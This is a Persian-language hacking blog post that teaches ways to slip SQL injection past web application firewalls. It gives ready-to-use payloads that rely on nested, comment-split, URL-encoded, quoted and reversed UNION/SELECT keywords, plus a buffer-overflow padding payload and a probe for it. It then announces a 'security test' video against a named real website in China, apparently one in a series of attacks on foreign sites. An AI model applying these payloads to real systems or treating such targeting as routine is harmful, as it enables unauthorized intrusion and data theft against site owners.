نوشته‌ها

مجموعه ۴ مطلب – شماره ۱۶

سلام خدمت دوستان عزیز

امیدوارم حال دلتون خوب باشه و تو این روزای قرنطینه به جای غر زدن، سعی کنید از فرصت استفاده کنید تا مهارت خودتون رو افزایش بدید.

این بخش از “۴ مطلب” رو از دست ندید چون قراره ۴ تا مطلب آموزشی قرار بدم. 😉 

 

۱- بایپس Waf

بایپس Waf

 

راستش یادم نیست قبلا داخل سایت مطلبی در مورد Waf گفتم یا نه!!

برای همین یه توضیح مختصر در مورد waf میدم.

WAF گزینه ایست که بین فایروال و وب سرور قرار می‌گیرد و وظیفه کنترل کاربران را بر عهده دارد و از حملاتی که سبب دسترسی کاربران غیر مجاز به اطلاعات محرمانه می‌شود جلوگیری می‌کند.

WAF در دو نوع نرم‌افزاری و سخت‌افزاری وجود دارد.

بیش از ۷۵ درصد از حملاتی که منجر به دسترسی غیرمجاز هکرها به اطلاعات می‌شود، از طریق Web صورت می‌گیرد.

به این دلیل که دسترسی به وب سرور، هم دسترسی به دیتای اصلی یک سایت است، هم راه نفوذ را برای ورود به سایر سرورهای یک Data Center مقدور می‌سازد.

حملاتی که WAF در لایه ۷ از بروز آنها روی وب سرور جلوگیری می‌کند به شرح زیر می‌باشند:

  •  Protection against common attacks
  •  SQL Injection
  •  (Cross Site Scripting (XSS
  •  (Cross-Site Request Forgery (CSRF
  •  Session Hijacking
  •  Buffer Overflow
  •  OS command injection
  •  Information leakage
  •  (Denial of Service (DoS
  •  Malicious Robots
  •  Parameter Tampering
  •  Malicious and Illegal Encoding
  •  Directory Traversal
  •  Web Server and OS Attacks
  •  Site Reconnaissance
  • Remote File Inclusion (RFI)

حالا که با مفهوم waf آشنا شدید بریم سراغ یکی از روش‌های دور زدن همین waf.

من اسم این روش رو میزارم union تودرتو.

بعضی وقتا سایت به دستور union یا select حساسه.

در این شرایط شما اگر هرکاری برای بایپس کردن انجام بدید بی نتیجه باقی می‌مونه، علتشم اینه که دستور union یا select پاک میشه.

حالا باید چکار کنیم؟نگران نباشید روش تودرتو جواب میده.

 

 uniunionon selselectect

 

در این شرایط WAF کلمه کلیدی که انتخاب کرده را حذف می‌کند.یعنی همان کلمه union و select.

به محض اینکه دستورات فیلتر شد، برای نمونه کلمه کلیدی select حذف می‌شود و sel از ابتدا و ect از انتها ادغام می‌شود و یک select جدید ایجاد و در سرور اجرا می‌شود.

 

۲- ۲ بایپس ساده

در ادامه بحث قبلی بایپس رو ادامه میدم.

روش‌های زیادی برای بایپس کردن waf وجود داره.

برای نمونه فرض کنیم سایت ما به دستور union و select یا یکی از این‌ها حساس است.

id=1+un/**/ion+sel/**/ect+1,2,3

id=1+un*ion+sel*ect+1,2,3

 

این دو روش رو به خاطر بسپارید.این روش‌ها می‌تونه راهگشای کار شما در فرایند تست نفوذ با استفاده از Sql injection باشه.

۳- روش Buffer Overflow + SQL Injection

Buffer Overflow + SQL Injection

برای کسانی که نمی‌دانند ، “سرریز بافر یا اضافه بافر ، ناهنجاری است که در آن یک برنامه، در حالی که داده را در یک بافر می‌نویسد ، از مرز بافر عبور کرده و مکان‌های حافظه مجاور را رونویسی می‌کند.”.

ما می‌توانیم از این آسیب‌پذیری که در برخی از WAF ها وجود دارد استفاده کنیم.

بسیاری از فایروال ها با C یا C++ نوشته شده‌اند که می توانیم آنها را با سرریز بافر خراب کنیم، چون برخی از متغیرهای برنامه می‌توانند فقط مقدار کمی حافظه را بگیرند و در صورت عدم محافظت یا کدگذاری نامناسب، می‌توانیم آن را دور بزنیم.

اجازه بدید یک مثال داشته باشیم:

 

http://www.website.com/?id=-15+and+(select 1)=(Select 0xAA here we add about 1000 A)+/*!uNIOn*/+/*!SeLECt*/+1,2

 

حالا سوال اساسی اینجاست که از کجا بفهمیم میشه از این روش Buffer Overflow استفاده کرد یا نه؟

برای این که متوجه بشیم کافیه فایروال رو تست کنیم.از دستور زیر استفاده می‌کنیم.

 

http://www.website.com/ id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/% 0A/*nnaa*/+1,2

 

بعد از زدن این دستور اگر سایت ارور ۵۰۰ داد یعنی میشه از این روش استفاده کرد.

 

۴- بازم بایپس 😉 

بایپس sql injection

 

خسته که نشدید؟ 😀 

اونایی که میگن خسته شدیم دیگه هک رو ادامه ندن.چون هک یعنی دنیایی از این چالش‌ها.

اما اونایی که نه تنها خسته نشدن بلکه تشنه‌ی یادگیری مطلب جدید هستن این بخش هم مطالعه کنن.

خب با روش‌های مختلفی رو تست زدیم بریم سراغ یه روش دیگه.

 

http://www.website.com/?id=15 /*!u%6eion*/ /*!se%6cect*/ 1,2

 

لازم نیست که همیشه فقط کاراکتر اول را encode کنیم.این کار رو میشه وسط دستور هم انجام داد و اتفاقا بعضی مواقع خیلی خوب جواب میده.

خیلی وقت‌ها کوتیشن میتونه راه گشا باشه.مثل حالت زیر:

 

http://www.website.com/?id=-15+uni’on+sel’ect+1,2

 

حالا که اینقدر با لذت تا اینجای مطلب رو مطالعه کدی پس بزار یه روش دیگه هم بهت نشون بدم.

 

/* — */union/* — */select/* — */

 

یه مورد دیگم داریم که بهش میگیم روش معکوس یا REVERSE

 

REVERSE(noinu)+REVERSE(tceles)

 

در این روش هم کار بسیار سادست، کافیه کلمه union و select  رو از آخر به اول بنویسیم.

که میشه به این حالتی که در بایپس مشاهده کردید.

 

نوشتن این ۴ مطلب تقریبا ۱ ساعت زمان برد.فدای سر تک تک شما عزیزان.ولی خیلی خوب میشه اگر این مطلب رو با دوستانتون به اشتراک بگذارید تا یکم روحیه بگیرم 😉 

 

 

 

 

 

ویدیو آموزش تست امنیت سایت (سایت شماره ۲۲)

ویدیو آموزش تست امنیت سایت (سایت شماره ۲۲)

ویدیو آموزش تست امنیت سایت (سایت شماره 22)

سلام خدمت شما

با بیست و دومین ویدیو آموزشی تست امنیت سایت در خدمت شما بزرگواران هستم.

تارگت قبلی از کشور روسیه بود و امروز تارگتی از کشور چین را خواهیم داشت.

ابتدا کمی با کشور چین آشنا شویم:

چین با نام رسمی PRC People’s Republic of China جمهوری خلق چین کشوری است که در شرق قاره آسیا واقع شده‌است.

این کشور بر اساس فهرست کشورها بر پایه جمعیت با بیش از ۱٫۴۳۳ میلیارد نفر سکنه (۲۰۲۰) پرجمعیت‌ترین کشور دنیاست.

جمهوری مردمی چین با حدود ۹٫۶ میلیون کیلومتر مربع چهارمین کشور وسیع دنیا بعد از روسیه؛ کانادا؛ و آمریکا است؛ و همچنین دومین کشور بزرگ دنیا از نظر وسعت خاکی است.

از هنگام اجرای اصلاحات اقتصادی در چین برای پی‌ریزی یک اقتصاد مدرن، چین یکی از سریع‌ترین رشدهای اقتصادی دنیا را داشته‌است.

این کشور هم‌اکنون بزرگترین صادرکننده و دومین واردکنندهٔ بزرگ کالا است و دومین اقتصاد بزرگ دنیا بر پایهٔ تولید ناخالص داخلی را در اختیار دارد.

چین عضو دائم شورای امنیت سازمان ملل و سازمان‌های چندجانبه‌ای همچون سازمان تجارت جهانی، اپک، سازمان همکاری شانگهای و گروه ۲۰ است.

چین به عنوان کشوری دارای سلاح هسته‌ای از بزرگترین ارتش دائمی دنیا و دومین بودجه دفاعی بزرگ دنیا برخوردار است.

چین از سوی برخی از دانشگاهیان، تحلیل‌گران نظامی، اقتصادی و سیاسی یک ابرقدرت بالقوه لقب گرفته‌است.

زبان چینی با ۱٬۷۰۰٬۰۰۰٬۰۰۰ نفر گوینده پرشمارترین زبان دنیا به‌شمار می‌رود.

حالا که کمی با این کشور آشنا شدید بریم سراغ وب‌سایت خودمون.

بعضی از تارگت‌ها به دلیل وجود Waf نیاز به ترکیب کردن بایپس‌ها و تست بایپس‌های مختلف دارند.

بعضی وقت‌ها شاهد این موضوع هستیم که روش‌های قدیمی همچنان کاربردی هستند.

ویدیو امروز شاهدی بر این ادعاست.

سایت مورد بررسی : http://fiberotech.com

سایت مربوط به کشور چین می‌باشد.

 
 

ویدیو آموزش تست امنیت سایت (سایت شماره ۲۲)